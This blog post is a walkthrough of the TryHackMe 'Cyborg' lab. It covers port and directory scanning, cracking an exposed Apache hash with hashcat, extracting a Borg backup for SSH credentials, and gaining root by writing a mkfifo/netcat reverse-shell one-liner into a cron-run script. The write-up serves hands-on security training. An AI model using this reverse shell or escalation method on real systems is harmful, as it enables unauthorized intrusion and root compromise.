Tryhackme: Cyborg — WalkThrough - CyberSec Nerds

Tryhackme: Cyborg — WalkThrough

Today, we will be doing an easy box from TryHackMe called Cyborg which is labeled as a beginner-level room that aims at teaching basic web recon, hash cracking, backup decryption, and exploiting misconfigured cron jobs. Without further ado, let’s connect to our THM OpenVPN network and start hacking!!!

Reconnaissance

Lets spin up our nmap tool and start scanning the machine for open ports.

From the above results, we can clearly see that only two ports are open: Port 22 (SSH) and Port 80 (HTTP). Let’s navigate to the web-page hosted by the machine. We can see that it is just the default Apache “It Works” page. 

After scanning for the hidden directories using dirsearch tool, we found out two suspicious directories: /admin and /etc. Lets check them out.

Directory scanning using dirsearch.py

Inside the admin directory, there is a small personal blog of a music artist running on this machine. We check around and find a toggled download in archive. This lets us download an archive.tar file. We will save this for later.

Going over to the Admins section we can see there is a shout box where people can message each other. They talk about a music archive but the most important part is the section on the squid proxy.

Squid is essentially just a proxy for http but we don’t need to look into this too much. They claim there is some config files laying about. So lets get googling and find out where these are located.

We find out they are located in /etc/squid/squid.conf , dirsearch picks up the /etc directory as well. So lets check that out.

/etc/squid folder

Inside the /etc/squid folder, two files are present:

  • squid.conf – Configuration file for the squid proxy. At the top, it refers to a password file.
  • passwd – Consists of an account name along with its password’s hash.
/etc/squid/squid.conf
/etc/squid/passwd

Cracking the hash

https://hashcat.net/wiki/doku.php?id=example_hashes is an awesome place where you can find all the hash types along with their example. Lets search for the given hash type : $apr1$. This is a format used by Apache systems and its corresponding hash mode is 1600.

We will be using hashcat tool along with the wordlist “rockyou.txt” for cracking the hash.

Voila! We have our credentials.
music_archive: [redacted]

Now, its time to look into the tar archive we downloaded. Lets untar the file and the listing is found as shown below.

After peeking at the README file, I came to know that this is a Borg Backup repository which I had never heard before. Lets jump into their documentation https://borgbackup.readthedocs.io/ and find out what borg really is.

Then I came to know that this is just a type of backup software with file-compression. You can see that in the Usage topic, there is a section on extracting the files with the following command.

borg extract --list /path/to/repo::my-files

We can get our path to repo by doing pwd.

As for the my-files part, this seems to be the music_archive that was mentioned earlier and as the username for the hash. We used the passphrase that was just cracked.

The extraction just took couple of seconds to complete. Inside the Documents folder remains a note.txt file which contains the SSH login credentials for the user alex.

SSHing into the machine

The user flag was immediately found after the login, inside the home directory.

Its now time to own the system. Lets search for the files owned by root having SIUD bit ON.

Privilege Escalation

The result, however, doesn’t contain any useful information. Lets check for the sudo privileges for the user “alex”. A script was found that can be run with super user privileges whose job is to backup all the music (*.mp3 extension) files present within the system.

If you ran LinPeas.sh , then you would see the script is running as a cronjob being executed every minute. So now lets abuse this script by adding malicious reverse shell code which will bring the machine’s root shell into our attacking machine.

echo ‘rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.147.137 9001 >/tmp/f’ > /etc/mp3backups/backup.sh

We will be listening with a netcat listener at port 9001.

Thanks to the cron job handler, it took about a minute for the script to throw the reverse shell back to my machine. Wow! This is a root shell.

List down the files. There’s the root flag which we have been looking for.

Yipee! We have owned the system. Happy Hacking!!!

Kiran Dawadi

Founder of cybersecnerds.com. Electronics Engineer by profession, Security Practitioner by passion. I am a Linux Enthusiast and highly interested in the offensive side of the CyberSec industry. You will find me reading InfoSec blogs most of the time.

Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments